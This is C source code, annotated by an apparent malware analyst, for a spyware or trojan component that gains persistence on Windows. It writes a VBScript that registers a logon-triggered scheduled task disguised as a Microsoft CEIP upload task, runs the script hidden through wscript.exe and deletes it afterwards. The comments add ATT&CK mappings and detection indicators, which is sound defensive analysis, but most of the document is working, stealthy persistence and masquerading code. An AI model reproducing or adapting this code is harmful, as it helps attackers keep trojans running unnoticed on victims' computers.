Startup persistence using the Windows Task Scheduler

/*
 * First half of a VBScript that registers a logon-triggered scheduled task
 * through the Task Scheduler COM interface ("Schedule.Service").
 *
 * The adjacent string literals below are not separated by commas, so they
 * concatenate into ONE string: the array has a single element, and only
 * szDataA[0] is written out by Task_scheduler().
 *
 * Analyst notes (persistence via scheduled task, MITRE ATT&CK T1053.005,
 * combined with task masquerading, T1036.004):
 *   - The task is placed in a folder "\WPD" created directly under the
 *     scheduler root.
 *     NOTE(review): the genuine Windows task with this description is
 *     believed to live under \Microsoft\Windows\WPD; a root-level \WPD
 *     folder is therefore a useful hunting pivot. Confirm against a clean
 *     reference image.
 *   - Description and Author are copied from a Microsoft CEIP task, so the
 *     entry looks benign in the Task Scheduler UI. Compare the registered
 *     action path and its signature rather than trusting these fields.
 *   - The settings remove the usual limits (execution time limit of 9999
 *     days, runs on battery, not stopped when idle ends).
 */
const char *szDataA[]= {
	                                                "on error resume next\r\n"
							/* script errors are suppressed, so a failed step produces no visible dialog */
							"Err.clear\r\n"
						   	"const TriggerTypeLogon = 9\r\n"
							"const ActionTypeExecutable = 0\r\n"
							"const TASK_INSTANCES_IGNORE_NEW = 2\r\n"
							"const createOrUpdateTask = 6\r\n"
							"const TASK_LOGON_INTERACTIVE_TOKEN = 3\r\n"
							"Set service = CreateObject(\"Schedule.Service\")\r\n"
							"call service.Connect()\r\n"
							"Dim rootFolder\r\n"
							"Set rootFolder = service.GetFolder(\"\\\")\r\n"
							/* creates the task folder \WPD at the scheduler root, then switches to it */
							"rootFolder.CreateFolder(\"\\WPD\")\r\n"
							"Set rootFolder = service.GetFolder(\"\\WPD\")\r\n"
							"Dim taskDefinition\r\n"
							"Set taskDefinition = service.NewTask(0)\r\n"
							"Dim regInfo\r\n"
							"Set regInfo = taskDefinition.RegistrationInfo\r\n"
							/* masquerade: description and author imitate a Microsoft CEIP task */
							"regInfo.Description = \"This task uploads Customer Experience Improvement Program (CEIP) data for Portable Devices.\"\r\n"
							"regInfo.Author = \"Microsoft Corporation\"\r\n"
							"Dim settings\r\n"
							"Set settings = taskDefinition.Settings\r\n"
							"settings.StartWhenAvailable = True\r\n"
							"settings.ExecutionTimeLimit = \"P9999D\"\r\n"
							"settings.DisallowStartIfOnBatteries = False\r\n"
							"settings.StopIfGoingOnBatteries = False\r\n"
							"settings.IdleSettings.StopOnIdleEnd = False\r\n"
							"settings.MultipleInstances = TASK_INSTANCES_IGNORE_NEW\r\n"
							"Dim triggers\r\n"
							"Set triggers = taskDefinition.Triggers\r\n"
							"Dim trigger\r\n"
							/* logon trigger: the action runs each time the named user logs on */
							"Set trigger = triggers.Create(TriggerTypeLogon)\r\n"
							"Dim startTime, endTime\r\n"
							"startTime = \"2007-01-01T00:00:00\"\r\n"
							/* endTime is assigned but never applied to the trigger in the visible script */
							"endTime = \"2059-12-31T23:59:59\"\r\n"
							"trigger.StartBoundary = startTime\r\n"
							/* fixed trigger Id string; usable as a static indicator in exported task XML */
							"trigger.Id = \"RundllAutoStart\"\r\n"

};

/*
 * Second half of the VBScript, used as a wsprintf format string with four
 * %s fields, filled by Task_scheduler() in this order:
 *   1. trigger.UserId    <- current user name
 *   2. Action.Path       <- szFileName
 *   3. Action.Arguments  <- szTrojanName, followed by the fixed ", DF7CD2SCRT"
 *   4. task name suffix  <- szTime (YYYYMMDDhhmmss of the local clock)
 *
 * Analyst notes:
 *   - The task name imitates "SqmUpload_<SID>", but the third sub-authority
 *     is a 14-digit timestamp. That exceeds the 32-bit range of a SID
 *     sub-authority, so the embedded "SID" is structurally invalid and does
 *     not match the SID of any account on the host.
 *   - The fixed prefix "SqmUpload_S-1-5-21-901245272-4294329958-", the
 *     "-1000" suffix and the argument tail ", DF7CD2SCRT" are constant
 *     strings in this listing and can be matched in task XML or command-line
 *     telemetry.
 *   - The task is registered for the interactive token of the logged-on
 *     user (logon type 3), so no password is stored with the task.
 *   NOTE(review): the trigger Id "RundllAutoStart" and the "<name>, <export>"
 *   argument shape suggest Action.Path is rundll32.exe with a DLL path and
 *   export name; the caller is not shown, so confirm before relying on it.
 */
const char szDataB[]=     
	                      	                        "trigger.UserId = \"%s\"\r\n"
						  	"trigger.ExecutionTimeLimit = \"\"\r\n"
						  	"Dim Action\r\n"
						  	"Set Action = taskDefinition.Actions.Create( ActionTypeExecutable )\r\n"
						  	"Action.Path = \"%s\"\r\n"
						  	"Action.Arguments = \"%s, DF7CD2SCRT\"\r\n"
						  	"Dim princ\r\n"
						  	"Set princ = taskDefinition.Principal\r\n"
						  	"princ.UserId = trigger.UserId\r\n"
						  	"princ.LogonType = TASK_LOGON_INTERACTIVE_TOKEN\r\n"
						  	/* createOrUpdateTask (6): an existing task with the same name is overwritten */
						  	"call rootFolder.RegisterTaskDefinition( _\r\n"
						  	"    \"SqmUpload_S-1-5-21-901245272-4294329958-%s-1000\", taskDefinition, createOrUpdateTask, _\r\n"	
						  	"    trigger.UserId, , 3)\r\n";

/*
 * Writes the two VBScript halves (szDataA[0], then szDataB with its fields
 * filled in) to the file szSpywareName, runs that file with wscript.exe in a
 * hidden window, waits for it to exit, and deletes the script.
 *
 * szSpywareName  path of the temporary script file that is written, executed
 *                and then removed
 * szFileName     inserted into the script as Action.Path of the task
 * szTrojanName   inserted into the script as the first part of
 *                Action.Arguments
 *
 * Returns false if CreateProcess fails, true after wscript.exe has exited
 * and the script was removed, and TRUE as well when PathFileExists reports
 * that the script file is missing (the final return).
 *
 * NOTE(review): _buffer, st, h, m, s, Y, M, D, szTime and dwWritten are not
 * declared in this listing; presumably they are file-scope variables defined
 * elsewhere.
 *
 * Observable artifacts for detection and forensics:
 *   - a short-lived script file created and deleted by the same process;
 *   - a child process "wscript.exe <script path>" started with
 *     CREATE_NO_WINDOW by a parent that is not an interactive shell;
 *   - a new task under \WPD. Task registration is normally recorded as
 *     event 106 in Microsoft-Windows-TaskScheduler/Operational and, when
 *     object-access auditing is enabled, as Security event 4698. Confirm the
 *     logging configuration on the host under investigation.
 */
BOOL Task_scheduler(LPSTR szSpywareName,LPSTR szFileName,LPSTR szTrojanName){
	
	STARTUPINFO si;
        PROCESS_INFORMATION pi;
	
	char szArg[MAX_PATH]  = {0};
	char UserName[40],szBuffer[1024];
	ZeroMemory(&si, sizeof(si));
        ZeroMemory(&pi, sizeof(pi));
	
	/* the current user's name becomes trigger.UserId and the task principal */
	GetUserName(UserName, &_buffer);
	
	GetLocalTime(&st);
	
	/* build zero-padded two-digit fields; the result is YYYYMMDDhhmmss */
	wsprintf(h, (st.wHour   < 10) ? "0%d":"%d", st.wHour);
	wsprintf(m, (st.wMinute < 10) ? "0%d":"%d", st.wMinute);
	wsprintf(s, (st.wSecond < 10) ? "0%d":"%d", st.wSecond);
	
	wsprintf(Y,"%d", st.wYear);
	
	wsprintf(M, (st.wMonth  < 10) ? "0%d":"%d", st.wMonth);
	wsprintf(D, (st.wDay    < 10) ? "0%d":"%d", st.wDay);
	
	/* szTime is the per-install part of the task name, so the name differs on every run */
	wsprintf(szTime,"%s%s%s%s%s%s",Y,M,D,h,m,s);
	
	
	
	/* OPEN_ALWAYS plus a seek to FILE_END: the text is appended if the file already exists */
	HANDLE hFile = CreateFile(szSpywareName, (GENERIC_READ | GENERIC_WRITE), 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        SetFilePointer(hFile, NULL, NULL, FILE_END);
	WriteFile(hFile , szDataA[0], strlen(szDataA[0]), &dwWritten, NULL);
	CloseHandle(hFile);	
	
	
	/* second pass appends szDataB with user name, action path, arguments and timestamp filled in */
	hFile = CreateFile(szSpywareName, (GENERIC_READ | GENERIC_WRITE), 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	SetFilePointer(hFile, NULL, NULL, FILE_END);
	wsprintf(szBuffer,szDataB,UserName,szFileName,szTrojanName,szTime); 
	WriteFile(hFile, szBuffer, strlen(szBuffer), &dwWritten, NULL);
	CloseHandle(hFile);	
	
	if (PathFileExists(szSpywareName)){

			/* command line seen in process-creation telemetry: "wscript.exe <script path>" */
			wsprintf(szArg,"%s %s","wscript.exe",szSpywareName);
			
			if ( !CreateProcess(NULL,szArg,NULL,NULL,false,CREATE_NO_WINDOW, NULL,NULL, &si, &pi) ){
                      
						 OutputDebugStringA("CreateProcess failed!");
						 return false;
			}
                    
			else{
              
				/* blocks until the script host exits, then deletes the script from disk */
				WaitForSingleObject(pi.hProcess,INFINITE);
				CloseHandle(pi.hProcess);
				remove(szSpywareName);
				return true;
			
			}
            
        
	}
	
	return TRUE;
}
